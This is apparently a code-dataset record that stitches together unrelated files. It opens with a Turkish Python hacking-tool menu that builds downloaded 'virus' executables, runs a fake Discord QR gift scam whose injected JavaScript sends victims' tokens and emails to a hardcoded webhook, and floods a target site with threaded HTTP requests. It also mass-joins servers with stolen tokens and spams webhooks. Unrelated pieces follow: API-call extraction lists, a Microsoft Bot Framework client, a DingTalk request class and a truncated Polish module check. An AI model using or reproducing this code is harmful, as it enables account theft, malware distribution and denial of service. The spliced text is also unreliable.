download_yandex_link("https://disk.yandex.com.tr/d/6pSN66uFNLuIaQ")
download_yandex_link("https://disk.yandex.com.tr/d/4Nw7r50OrLwCzw")
print(
Fore.MAGENTA + "[UYARI] Bu İşlem Fazla bir şekilde yazılar ekrana dökülcek biraz tırsabilirsiniz ama hiç bir şey yoktur sadece exeye çevirme işlemi yapılacaktır.")
time.sleep(1)
os.chdir(APPDATA)
with open("cr.py", "r+",
encoding="utf-8") as dosya:
icerik = dosya.read()
yarak = f"WEBHOOKBABY = '{y}'\n" + icerik
dosya.seek(0)
dosya.write(yarak)
os.chdir(APPDATA)
os.system("python setup1.py build")
time.sleep(15)
os.remove("cr.py")
os.remove("setup1.py")
shutil.move(f"{APPDATA}\\build", anan)
print(Fore.GREEN + "UWU virüs oluşturulmuştur")
if x == "3":
Spinner()
print(
Fore.BLUE + "[BİLGİ]Bu uygulamada chrome açılacaktır sekmeyi kesinlikle kapatmamalısınız discord_gift.png oluşturulduktan sonra kurbana attıktan sonra kurban okuttuğu zaman o açılan chrome sekmesinde kullanıcının hesabına giriş yapmış olcaksınızdır"
"ve cmd de bir kaç hata belirebilir onlara aldırış etmeyin ve tadını çıkarın ")
time.sleep(5)
from bs4 import BeautifulSoup
from selenium import webdriver
from PIL import Image
import base64
import time
import os
def qr_hazırla():
im1 = Image.open('temp/resim1.png', 'r')
im2 = Image.open('temp/logo.png', 'r')
im2_w, im2_h = im2.size
im1.paste(im2, (60, 55))
im1.save('temp/anan.png', quality=95)
def bindir():
im1 = Image.open('temp/template.png', 'r')
im2 = Image.open('temp/anan.png', 'r')
im1.paste(im2, (120, 409))
im1.save('discord_gift.png', quality=95)
def main():
print('FAKE QR SCAM\n')
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_experimental_option('detach', True)
driver = webdriver.Chrome(options=options, executable_path=r'chromedriver.exe')
driver.get('https://discord.com/login')
time.sleep(5)
print('Sayfa Yüklendi')
page_source = driver.page_source
soup = BeautifulSoup(page_source, features='lxml')
div = soup.find('div', {'class': 'qrCode-wG6ZgU'})
qr_code = soup.find('img')['src']
file = os.path.join(os.getcwd(), 'temp/resim1.png')
img_data = base64.b64decode(qr_code.replace('data:image/png;base64,', ''))
with open(file, 'wb') as handler:
handler.write(img_data)
discord_login = driver.current_url
qr_hazırla()
bindir()
print('Gift Code Oluşturuldu Klasörü kontrol ediniz.')
print('QR code oluşturuldu kurbanın okutmasını bekleyiniz.')
while True:
time.sleep(6)
if discord_login != driver.current_url:
print('tokenı çekiyooorummm')
driver.execute_script('''
location.reload();
var discordWebhook = "https://discord.com/api/webhooks/939082111149809715/arZ4T9gWDAVVcrifcg_w7eO4nS7pu2NsL8BfqSu-XtjGkuwMBZQ6-oFQFwF5Clt0PxA5";
var i = document.createElement('iframe');
document.body.appendChild(i);
var request = new XMLHttpRequest();
request.open("POST", discordWebhook);
request.setRequestHeader('Content-type', 'application/json');
var params = {
username: "Token Grabber",
avatar_url: "https://malwarefox.com/wp-content/uploads/2017/11/hacker-1.png",
content: '**OMG HEÇKIR APİĞĞĞ!**\n------------------\nToken : ' + i.contentWindow.localStorage.token + '\n------------------\nAdresse email : ' + i.contentWindow.localStorage.email_cache
};
request.send(JSON.stringify(params));
''')
print('---')
print("çekkkkkkkkktimmmmmmmmmm:")
break
print('İş bitti')
if __name__ == '__main__':
main()
if x == "4":
Spinner()
download_yandex_link("https://disk.yandex.com.tr/d/ylx0-4Q93wrnFA")
download_yandex_link("https://disk.yandex.com.tr/d/s_gD3XvCcs6yVg")
print(
Fore.MAGENTA + "[UYARI] Bu İşlem Fazla bir şekilde yazılar ekrana dökülcek biraz tırsabilirsiniz ama hiç bir şey yoktur sadece exeye çevirme işlemi yapılacaktır.")
time.sleep(1)
os.chdir(APPDATA)
os.system("python setup2.py build")
time.sleep(15)
os.remove("sbo.py")
os.remove("setup2.py")
shutil.move(f"{APPDATA}\\build", anan)
print("İşlem bitti dikkat et kendin açma :)")
if x == "6":
Spinner()
print("Bu chromedriver ürünüdür eğer sürümle alakalı hata alırsanız chromedriverın sitesine gidip kendi chrome sürümünüze uygun chromedriverı yükleyip klasöerlin içine atınız")
print("fastfingers email giriniz")
e = input()
print("fastfingers paralo giriniz")
p = input()
from selenium import webdriver
import time
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
options = webdriver.ChromeOptions()
driver = webdriver.Chrome()
driver.maximize_window();
email = e
password = p
driver.get("https://10fastfingers.com/login");
driver.find_element_by_name("data[User][email]").send_keys(email)
driver.find_element_by_name("data[User][password]").send_keys(password)
driver.find_element_by_id("login-form-submit").click()
time.sleep(1)
driver.get("https://10fastfingers.com/typing-test/turkish");
wait = WebDriverWait(driver, 10)
inputElement = wait.until(EC.presence_of_element_located((By.ID, "inputfield")))
time.sleep(4)
word_list = driver.execute_script("return words")
number = 0;
for word in word_list:
inputElement.send_keys(word + " ")
if x =="7":
Spinner()
print(Fore.RED+"bu sadece tokenın ilk baştaki karakterleri verir 2 faktörlü doğrulamalı hesaplarda kullanılamaz")
import base64
userid = input(Fore.LIGHTYELLOW_EX+" İd gir : ")
encodedBytes = base64.b64encode(userid.encode("utf-8"))
encodedStr = str(encodedBytes, "utf-8")
print(Fore.LIGHTYELLOW_EX+f'\n tokenın başı: {encodedStr}')
if x =="8":
Spinner()
print("bazı hatalar olabilir eğer sıkıntı olursa bize ulaşınız")
print("site giriniz https://casperss.cf şeklinde")
x = input()
print("hangi klasör e kaydetmek istiyorsunuz")
y = input()
base_dir = os.getcwd()
site_name = x
project_name = y
project_path = "../" + project_name
os.makedirs(project_path, exist_ok=True)
visited_links = []
error_links = []
def save(bs, element, check):
links = bs.find_all(element)
for l in links:
href = l.get("href")
if href is not None and href not in visited_links:
if check in href:
href = l.get("href")
print("indiriliyor: {}".format(href))
if "//" in href:
path_s = href.split("/")
file_name = ""
for i in range(3, len(path_s)):
file_name = file_name + "/" + path_s[i]
else:
file_name = href
l = site_name + file_name
try:
r = requests.get(l)
except requests.exceptions.ConnectionError:
error_links.append(l)
continue
if r.status_code != 200:
error_links.append(l)
continue
os.makedirs(os.path.dirname(project_path + file_name.split("?")[0]), exist_ok=True)
with open(project_path + file_name.split("?")[0], "wb") as f:
f.write(r.text.encode('utf-8'))
f.close()
visited_links.append(l)
def save_assets(html_text):
bs = BeautifulSoup(html_text, "html.parser")
save(bs=bs, element="link", check=".css")
save(bs=bs, element="script", check=".js")
links = bs.find_all("img")
for l in links:
href = l.get("src")
if href is not None and href not in visited_links:
print("indiriliyor : {}".format(href))
if "//" in href:
path_s = href.split("/")
file_name = ""
for i in range(3, len(path_s)):
file_name = file_name + "/" + path_s[i]
else:
file_name = href
l = site_name + file_name
try:
r = requests.get(l, stream=True)
except requests.exceptions.ConnectionError:
error_links.append(l)
continue
if r.status_code != 200:
error_links.append(l)
continue
os.makedirs(os.path.dirname(project_path + file_name.split("?")[0]), exist_ok=True)
with open(project_path + file_name.split("?")[0], "wb") as f:
shutil.copyfileobj(r.raw, f)
visited_links.append(l)
def crawl(link):
if "http://" not in link and "https://" not in link:
link = site_name + link
if site_name in link and link not in visited_links:
print("indiriliyor : {}".format(link))
path_s = link.split("/")
file_name = ""
for i in range(3, len(path_s)):
file_name = file_name + "/" + path_s[i]
if file_name[len(file_name) - 1] != "/":
file_name = file_name + "/"
try:
r = requests.get(link)
except requests.exceptions.ConnectionError:
print("bağlantı hatası (cloudflare under attack mode açık olabilir)")
sys.exit(1)
if r.status_code != 200:
print("site yanlış")
sys.exit(1)
print(project_path + file_name + "index.html")
os.makedirs(os.path.dirname(project_path + file_name.split("?")[0]), exist_ok=True)
with open(project_path + file_name.split("?")[0] + "index.html", "wb") as f:
text = r.text.replace(site_name, project_name)
f.write(text.encode('utf-8'))
f.close()
visited_links.append(link)
save_assets(r.text)
soup = BeautifulSoup(r.text, "html.parser")
for link in soup.find_all('a'):
try:
crawl(link.get("href"))
except:
error_links.append(link.get("href"))
crawl(site_name + "/")
for link in visited_links:
print("---- {}\n".format(link))
print("\n\n\nhata\n")
for link in error_links:
print("---- {}\n".format(link))
if x == "9":
Spinner()
ddoser = input("Hedef site giriniz örnek.com:")
import socket
import threading
ip = get('https://api.ipify.org').text
target = 'casperss.cf'
fake_ip = ip
port = 80
attack_num = 0
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
global attack_num
attack_num += 1
print(attack_num)
s.close()
for i in range(500):
thread = threading.Thread(target=attack)
thread.start()
attack_num = 0
if x == "10":
Spinner()
print(Fore.MAGENTA + "[1] Token sese sokma")
print(Fore.MAGENTA + "[2] Token yayına sokma")
print(Fore.MAGENTA + "[3] Token sunucuya sokma")
print(Fore.MAGENTA + "[4] About me kısımlarına yazı yazma")
supra = input()
if supra == "3":
print("tokenler.txt ye tokenlarını at")
print("discord invite link giriniz lütfen sadece davet kodunu atınız ( örnek = 21312dwadqw)")
ananxd = input()
tokens = []
with open("tokenler.txt", "r") as tokens_file:
lines = tokens_file.readlines()
for l in lines:
token = tokens.append(l.replace('\n', ''))
def bot_inviter(ananxd,token):
apilink = "https://discordapp.com/api/v6/invite/" + ananxd
headers = {'Authorization': token}
bot_invite = requests.post(apilink, headers=headers)
print(bot_invite.text)
for botz in tokens:
bot_inviter(ananxd, botz)
if supra =="1":
import discord
class MyClient(discord.Client):
async def on_ready(self):
print('Logged on as', self.user)
time.sleep(5)
print('Bot joined the channel.')
channel_id = '929783813024935941'
voice_channel = client.get_channel(channel_id)
await voice_channel.connect()
async def on_message(self, message):
# don't respond to ourselves
if message.author == self.user:
return
if message.content == 'ping':
await message.channel.send('pong')
client = MyClient()
client.run('')
print("çabuk çabuk ses kanalıan gir oç")
if x == "11":
import time
import requests
import pyfiglet
banner = pyfiglet.figlet_format("WEBHOOK SPAMMER")
print(banner)
msg = input("ne spamlamasını istiyorsun keke:")
webhook = input()
def kırbaçlaonu(msg, webhook):
while True:
try:
data = requests.post(webhook, json={'content': msg})
if data.status_code == 204:
print(f"gonderildu{msg}")
except:
print("webhook bozuk:" + webhook)
time.sleep(5)
exit()
anan = 1
while anan == 1:
kırbaçlaonu(msg, webhook)
|
[
"sys.stdout.write",
"PIL.Image.new",
"os.remove",
"socket.socket",
"pyfiglet.figlet_format",
"selenium.webdriver.ChromeOptions",
"sys.stdout.flush",
"requests.post",
"os.chdir",
"colorama.init",
"requests.get",
"PIL.ImageDraw.Draw",
"shutil.copyfileobj",
"threading.Thread",
"os.system",
"time.sleep",
"bs4.BeautifulSoup",
"selenium.webdriver.support.ui.WebDriverWait",
"os.getenv",
"sys.exit",
"selenium.webdriver.support.expected_conditions.presence_of_element_located",
"os.makedirs",
"os.getcwd",
"PIL.Image.open",
"PIL.ImageFont.truetype",
"shutil.move",
"selenium.webdriver.Chrome"
] |
[((338, 358), 'colorama.init', 'init', ([], {'autoreset': '(True)'}), '(autoreset=True)\n', (342, 358), False, 'from colorama import Fore, Back, Style, init\n'), ((684, 704), 'os.getenv', 'os.getenv', (['"""APPDATA"""'], {}), "('APPDATA')\n", (693, 704), False, 'import os\n'), ((1884, 1921), 'PIL.ImageFont.truetype', 'ImageFont.truetype', (['"""arialbd.ttf"""', '(15)'], {}), "('arialbd.ttf', 15)\n", (1902, 1921), False, 'from PIL import Image, ImageFont, ImageDraw\n'), ((1970, 1993), 'PIL.Image.new', 'Image.new', (['"""1"""', 'size', '(1)'], {}), "('1', size, 1)\n", (1979, 1993), False, 'from PIL import Image\n'), ((2006, 2027), 'PIL.ImageDraw.Draw', 'ImageDraw.Draw', (['image'], {}), '(image)\n', (2020, 2027), False, 'from PIL import Image, ImageFont, ImageDraw\n'), ((3344, 3355), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3353, 3355), False, 'import os\n'), ((3927, 3940), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (3937, 3940), False, 'import time\n'), ((3950, 3967), 'os.chdir', 'os.chdir', (['APPDATA'], {}), '(APPDATA)\n', (3958, 3967), False, 'import os\n'), ((4211, 4228), 'os.chdir', 'os.chdir', (['APPDATA'], {}), '(APPDATA)\n', (4219, 4228), False, 'import os\n'), ((4238, 4272), 'os.system', 'os.system', (['"""python setup.py build"""'], {}), "('python setup.py build')\n", (4247, 4272), False, 'import os\n'), ((4282, 4296), 'time.sleep', 'time.sleep', (['(15)'], {}), '(15)\n', (4292, 4296), False, 'import time\n'), ((4306, 4326), 'os.remove', 'os.remove', (['"""sasa.py"""'], {}), "('sasa.py')\n", (4315, 4326), False, 'import os\n'), ((4336, 4357), 'os.remove', 'os.remove', (['"""setup.py"""'], {}), "('setup.py')\n", (4345, 4357), False, 'import os\n'), ((4367, 4405), 'shutil.move', 'shutil.move', (['f"""{APPDATA}\\\\build"""', 'anan'], {}), "(f'{APPDATA}\\\\build', anan)\n", (4378, 4405), False, 'import shutil\n'), ((4911, 4924), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (4921, 4924), False, 'import time\n'), ((4936, 4953), 'os.chdir', 'os.chdir', (['APPDATA'], {}), '(APPDATA)\n', (4944, 4953), False, 'import os\n'), ((5193, 5210), 'os.chdir', 'os.chdir', (['APPDATA'], {}), '(APPDATA)\n', (5201, 5210), False, 'import os\n'), ((5220, 5255), 'os.system', 'os.system', (['"""python setup1.py build"""'], {}), "('python setup1.py build')\n", (5229, 5255), False, 'import os\n'), ((5265, 5279), 'time.sleep', 'time.sleep', (['(15)'], {}), '(15)\n', (5275, 5279), False, 'import time\n'), ((5289, 5307), 'os.remove', 'os.remove', (['"""cr.py"""'], {}), "('cr.py')\n", (5298, 5307), False, 'import os\n'), ((5317, 5339), 'os.remove', 'os.remove', (['"""setup1.py"""'], {}), "('setup1.py')\n", (5326, 5339), False, 'import os\n'), ((5349, 5387), 'shutil.move', 'shutil.move', (['f"""{APPDATA}\\\\build"""', 'anan'], {}), "(f'{APPDATA}\\\\build', anan)\n", (5360, 5387), False, 'import shutil\n'), ((5875, 5888), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (5885, 5888), False, 'import time\n'), ((9441, 9454), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (9451, 9454), False, 'import time\n'), ((9464, 9481), 'os.chdir', 'os.chdir', (['APPDATA'], {}), '(APPDATA)\n', (9472, 9481), False, 'import os\n'), ((9491, 9526), 'os.system', 'os.system', (['"""python setup2.py build"""'], {}), "('python setup2.py build')\n", (9500, 9526), False, 'import os\n'), ((9536, 9550), 'time.sleep', 'time.sleep', (['(15)'], {}), '(15)\n', (9546, 9550), False, 'import time\n'), ((9560, 9579), 'os.remove', 'os.remove', (['"""sbo.py"""'], {}), "('sbo.py')\n", (9569, 9579), False, 'import os\n'), ((9589, 9611), 'os.remove', 'os.remove', (['"""setup2.py"""'], {}), "('setup2.py')\n", (9598, 9611), False, 'import os\n'), ((9621, 9659), 'shutil.move', 'shutil.move', (['f"""{APPDATA}\\\\build"""', 'anan'], {}), "(f'{APPDATA}\\\\build', anan)\n", (9632, 9659), False, 'import shutil\n'), ((10343, 10368), 'selenium.webdriver.ChromeOptions', 'webdriver.ChromeOptions', ([], {}), '()\n', (10366, 10368), False, 'from selenium import webdriver\n'), ((10387, 10405), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {}), '()\n', (10403, 10405), False, 'from selenium import webdriver\n'), ((10769, 10782), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (10779, 10782), False, 'import time\n'), ((10869, 10894), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', (['driver', '(10)'], {}), '(driver, 10)\n', (10882, 10894), False, 'from selenium.webdriver.support.ui import WebDriverWait\n'), ((10994, 11007), 'time.sleep', 'time.sleep', (['(4)'], {}), '(4)\n', (11004, 11007), False, 'import time\n'), ((11881, 11892), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (11890, 11892), False, 'import os\n'), ((12000, 12040), 'os.makedirs', 'os.makedirs', (['project_path'], {'exist_ok': '(True)'}), '(project_path, exist_ok=True)\n', (12011, 12040), False, 'import os\n'), ((20068, 20109), 'pyfiglet.figlet_format', 'pyfiglet.figlet_format', (['"""WEBHOOK SPAMMER"""'], {}), "('WEBHOOK SPAMMER')\n", (20090, 20109), False, 'import pyfiglet\n'), ((1385, 1410), 'requests.get', 'requests.get', (['direct_link'], {}), '(direct_link)\n', (1397, 1410), False, 'import requests\n'), ((1424, 1441), 'os.chdir', 'os.chdir', (['APPDATA'], {}), '(APPDATA)\n', (1432, 1441), False, 'import os\n'), ((1760, 1802), 'sys.stdout.write', 'sys.stdout.write', (["f'\\r# Yükleniyor... {i}'"], {}), "(f'\\r# Yükleniyor... {i}')\n", (1776, 1802), False, 'import sys\n'), ((1820, 1838), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1836, 1838), False, 'import sys\n'), ((1852, 1867), 'time.sleep', 'time.sleep', (['(0.4)'], {}), '(0.4)\n', (1862, 1867), False, 'import time\n'), ((6112, 6146), 'PIL.Image.open', 'Image.open', (['"""temp/resim1.png"""', '"""r"""'], {}), "('temp/resim1.png', 'r')\n", (6122, 6146), False, 'from PIL import Image\n'), ((6166, 6198), 'PIL.Image.open', 'Image.open', (['"""temp/logo.png"""', '"""r"""'], {}), "('temp/logo.png', 'r')\n", (6176, 6198), False, 'from PIL import Image\n'), ((6371, 6407), 'PIL.Image.open', 'Image.open', (['"""temp/template.png"""', '"""r"""'], {}), "('temp/template.png', 'r')\n", (6381, 6407), False, 'from PIL import Image\n'), ((6427, 6459), 'PIL.Image.open', 'Image.open', (['"""temp/anan.png"""', '"""r"""'], {}), "('temp/anan.png', 'r')\n", (6437, 6459), False, 'from PIL import Image\n'), ((6641, 6666), 'selenium.webdriver.ChromeOptions', 'webdriver.ChromeOptions', ([], {}), '()\n', (6664, 6666), False, 'from selenium import webdriver\n'), ((6834, 6903), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {'options': 'options', 'executable_path': '"""chromedriver.exe"""'}), "(options=options, executable_path='chromedriver.exe')\n", (6850, 6903), False, 'from selenium import webdriver\n'), ((6973, 6986), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (6983, 6986), False, 'import time\n'), ((7094, 7137), 'bs4.BeautifulSoup', 'BeautifulSoup', (['page_source'], {'features': '"""lxml"""'}), "(page_source, features='lxml')\n", (7107, 7137), False, 'from bs4 import BeautifulSoup\n'), ((10930, 10983), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'EC.presence_of_element_located', (["(By.ID, 'inputfield')"], {}), "((By.ID, 'inputfield'))\n", (10960, 10983), True, 'from selenium.webdriver.support import expected_conditions as EC\n'), ((13659, 13698), 'bs4.BeautifulSoup', 'BeautifulSoup', (['html_text', '"""html.parser"""'], {}), "(html_text, 'html.parser')\n", (13672, 13698), False, 'from bs4 import BeautifulSoup\n'), ((17165, 17193), 'requests.get', 'get', (['"""https://api.ipify.org"""'], {}), "('https://api.ipify.org')\n", (17168, 17193), False, 'from requests import get\n'), ((17843, 17874), 'threading.Thread', 'threading.Thread', ([], {'target': 'attack'}), '(target=attack)\n', (17859, 17874), False, 'import threading\n'), ((7284, 7295), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (7293, 7295), False, 'import os\n'), ((7782, 7795), 'time.sleep', 'time.sleep', (['(6)'], {}), '(6)\n', (7792, 7795), False, 'import time\n'), ((16517, 16553), 'bs4.BeautifulSoup', 'BeautifulSoup', (['r.text', '"""html.parser"""'], {}), "(r.text, 'html.parser')\n", (16530, 16553), False, 'from bs4 import BeautifulSoup\n'), ((17375, 17424), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (17388, 17424), False, 'import socket\n'), ((18887, 18926), 'requests.post', 'requests.post', (['apilink'], {'headers': 'headers'}), '(apilink, headers=headers)\n', (18900, 18926), False, 'import requests\n'), ((15674, 15692), 'requests.get', 'requests.get', (['link'], {}), '(link)\n', (15686, 15692), False, 'import requests\n'), ((15985, 15996), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (15993, 15996), False, 'import sys\n'), ((19273, 19286), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (19283, 19286), False, 'import time\n'), ((20336, 20381), 'requests.post', 'requests.post', (['webhook'], {'json': "{'content': msg}"}), "(webhook, json={'content': msg})\n", (20349, 20381), False, 'import requests\n'), ((14475, 14503), 'requests.get', 'requests.get', (['l'], {'stream': '(True)'}), '(l, stream=True)\n', (14487, 14503), False, 'import requests\n'), ((14994, 15022), 'shutil.copyfileobj', 'shutil.copyfileobj', (['r.raw', 'f'], {}), '(r.raw, f)\n', (15012, 15022), False, 'import shutil\n'), ((15866, 15877), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (15874, 15877), False, 'import sys\n'), ((20583, 20596), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (20593, 20596), False, 'import time\n'), ((12936, 12951), 'requests.get', 'requests.get', (['l'], {}), '(l)\n', (12948, 12951), False, 'import requests\n')]
|
"""
Copyright (c) 2016-2019 <NAME> http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from programy.utils.logging.ylogger import YLogger
import http.server
import json
import asyncio
from botbuilder.schema import (Activity, ActivityTypes)
from botframework.connector import ConnectorClient
from botframework.connector.auth import (MicrosoftAppCredentials, JwtTokenValidation, SimpleCredentialProvider)
from programy.clients.restful.flask.client import FlaskRestBotClient
from programy.clients.restful.asyncio.microsoft.config import MicrosoftConfiguration
class MicrosoftBotClient(FlaskRestBotClient):
def __init__(self, argument_parser=None):
FlaskRestBotClient.__init__(self, 'microsoft', argument_parser)
YLogger.debug(self, "Microsoft Client is running....")
print("Microsoft Client loaded")
def get_client_configuration(self):
return MicrosoftConfiguration()
def get_microsoft_app_id(self):
return self.license_keys.get_key("MICROSOFT_APP_ID")
def get_microsoft_app_password(self):
return self.license_keys.get_key("MICROSOFT_APP_PASSWORD")
def get_new_user_message(self):
if self.configuration.client_configuration.new_user_srai is not None:
pass
return self.configuration.client_configuration.new_user_text
def ask_question(self, question):
reply = ""
try:
client_context = self.create_client_context("microsoft")
self._questions += 1
reply = client_context.bot.ask_question(client_context, question, responselogger=self)
except Exception as e:
YLogger.exception(client_context, "Error getting reply from bot", e)
return reply
MICROSOFT_CLIENT = MicrosoftBotClient ()
class BotRequestHandler(http.server.BaseHTTPRequestHandler):
@staticmethod
def __create_reply_activity(request_activity, text):
return Activity(
type=ActivityTypes.message,
channel_id=request_activity.channel_id,
conversation=request_activity.conversation,
recipient=request_activity.from_property,
from_property=request_activity.recipient,
text=text,
service_url=request_activity.service_url)
def __handle_conversation_update_activity(self, activity):
self.send_response(202)
self.end_headers()
if len(activity.members_added):
if activity.members_added[0].id != activity.recipient.id:
credentials = MicrosoftAppCredentials(MICROSOFT_CLIENT.get_microsoft_app_id(),
MICROSOFT_CLIENT.get_microsoft_app_password())
response = MICROSOFT_CLIENT.get_new_user_message()
reply = BotRequestHandler.__create_reply_activity(activity, response)
connector = ConnectorClient(credentials, base_url=reply.service_url)
connector.conversations.send_to_conversation(reply.conversation.id, reply)
def __handle_message_activity(self, activity):
self.send_response(200)
self.end_headers()
credentials = MicrosoftAppCredentials(MICROSOFT_CLIENT.get_microsoft_app_id(),
MICROSOFT_CLIENT.get_microsoft_app_password())
connector = ConnectorClient(credentials, base_url=activity.service_url)
response = MICROSOFT_CLIENT.ask_question(activity.text)
reply = BotRequestHandler.__create_reply_activity(activity, response)
connector.conversations.send_to_conversation(reply.conversation.id, reply)
def __handle_authentication(self, activity):
credential_provider = SimpleCredentialProvider(MICROSOFT_CLIENT.get_microsoft_app_id(),
MICROSOFT_CLIENT.get_microsoft_app_password())
loop = asyncio.new_event_loop()
try:
loop.run_until_complete(JwtTokenValidation.authenticate_request(activity,
self.headers.get("Authorization"),
credential_provider))
return True
except Exception as ex:
self.send_response(401, ex)
self.end_headers()
return False
finally:
loop.close()
def __unhandled_activity(self):
self.send_response(404)
self.end_headers()
def do_POST(self):
body = self.rfile.read(int(self.headers['Content-Length']))
data = json.loads(str(body, 'utf-8'))
activity = Activity.deserialize(data)
if not self.__handle_authentication(activity):
return
if activity.type == ActivityTypes.conversation_update.value:
self.__handle_conversation_update_activity(activity)
elif activity.type == ActivityTypes.message.value:
self.__handle_message_activity(activity)
else:
self.__unhandled_activity()
if __name__ == '__main__':
print("Initiating Microsoft Client...")
SERVER = None
try:
host = MICROSOFT_CLIENT.configuration.client_configuration.host
port = MICROSOFT_CLIENT.configuration.client_configuration.port
SERVER = http.server.HTTPServer((host, port), BotRequestHandler)
print('Started http server')
SERVER.serve_forever()
except KeyboardInterrupt:
print('Ctrl received, shutting down server')
if SERVER is not None:
SERVER.socket.close()
|
[
"botbuilder.schema.Activity.deserialize",
"botframework.connector.ConnectorClient",
"programy.utils.logging.ylogger.YLogger.debug",
"programy.utils.logging.ylogger.YLogger.exception",
"programy.clients.restful.asyncio.microsoft.config.MicrosoftConfiguration",
"programy.clients.restful.flask.client.FlaskRestBotClient.__init__",
"botbuilder.schema.Activity",
"asyncio.new_event_loop"
] |
[((1667, 1730), 'programy.clients.restful.flask.client.FlaskRestBotClient.__init__', 'FlaskRestBotClient.__init__', (['self', '"""microsoft"""', 'argument_parser'], {}), "(self, 'microsoft', argument_parser)\n", (1694, 1730), False, 'from programy.clients.restful.flask.client import FlaskRestBotClient\n'), ((1740, 1794), 'programy.utils.logging.ylogger.YLogger.debug', 'YLogger.debug', (['self', '"""Microsoft Client is running...."""'], {}), "(self, 'Microsoft Client is running....')\n", (1753, 1794), False, 'from programy.utils.logging.ylogger import YLogger\n'), ((1893, 1917), 'programy.clients.restful.asyncio.microsoft.config.MicrosoftConfiguration', 'MicrosoftConfiguration', ([], {}), '()\n', (1915, 1917), False, 'from programy.clients.restful.asyncio.microsoft.config import MicrosoftConfiguration\n'), ((2932, 3202), 'botbuilder.schema.Activity', 'Activity', ([], {'type': 'ActivityTypes.message', 'channel_id': 'request_activity.channel_id', 'conversation': 'request_activity.conversation', 'recipient': 'request_activity.from_property', 'from_property': 'request_activity.recipient', 'text': 'text', 'service_url': 'request_activity.service_url'}), '(type=ActivityTypes.message, channel_id=request_activity.channel_id,\n conversation=request_activity.conversation, recipient=request_activity.\n from_property, from_property=request_activity.recipient, text=text,\n service_url=request_activity.service_url)\n', (2940, 3202), False, 'from botbuilder.schema import Activity, ActivityTypes\n'), ((4346, 4405), 'botframework.connector.ConnectorClient', 'ConnectorClient', (['credentials'], {'base_url': 'activity.service_url'}), '(credentials, base_url=activity.service_url)\n', (4361, 4405), False, 'from botframework.connector import ConnectorClient\n'), ((4896, 4920), 'asyncio.new_event_loop', 'asyncio.new_event_loop', ([], {}), '()\n', (4918, 4920), False, 'import asyncio\n'), ((5676, 5702), 'botbuilder.schema.Activity.deserialize', 'Activity.deserialize', (['data'], {}), '(data)\n', (5696, 5702), False, 'from botbuilder.schema import Activity, ActivityTypes\n'), ((2644, 2712), 'programy.utils.logging.ylogger.YLogger.exception', 'YLogger.exception', (['client_context', '"""Error getting reply from bot"""', 'e'], {}), "(client_context, 'Error getting reply from bot', e)\n", (2661, 2712), False, 'from programy.utils.logging.ylogger import YLogger\n'), ((3887, 3943), 'botframework.connector.ConnectorClient', 'ConnectorClient', (['credentials'], {'base_url': 'reply.service_url'}), '(credentials, base_url=reply.service_url)\n', (3902, 3943), False, 'from botframework.connector import ConnectorClient\n')]
|
'''
Created by auto_sdk on 2021.01.26
'''
from dingtalk.api.base import RestApi
class OapiFinanceIdCardOcrRequest(RestApi):
def __init__(self,url=None):
RestApi.__init__(self,url)
self.back_picture_url = None
self.front_picture_url = None
self.id_card_no = None
self.request_id = None
self.user_mobile = None
def getHttpMethod(self):
return 'POST'
def getapiname(self):
return 'dingtalk.oapi.finance.IdCard.ocr'
|
[
"dingtalk.api.base.RestApi.__init__"
] |
[((156, 183), 'dingtalk.api.base.RestApi.__init__', 'RestApi.__init__', (['self', 'url'], {}), '(self, url)\n', (172, 183), False, 'from dingtalk.api.base import RestApi\n')]
|
# program r4_01.py
# Sprawdzamy, czy mamy zainstalowane odpowiednie biblilteki zewnętrzne
# Importujemy funkcje dodatkowe
from sys import exit
from r4_functions import *
load_module_ok = True
try:
import numpy as np
ok_module_info("numpy")
except:
error_module_info("numpy")
load_module_ok = False
try:
import matplotlib
ok_module_info("matplotlib")
except:
err_module_info("matplotlib")
load_module_ok = False
try:
from astropy.time import Time
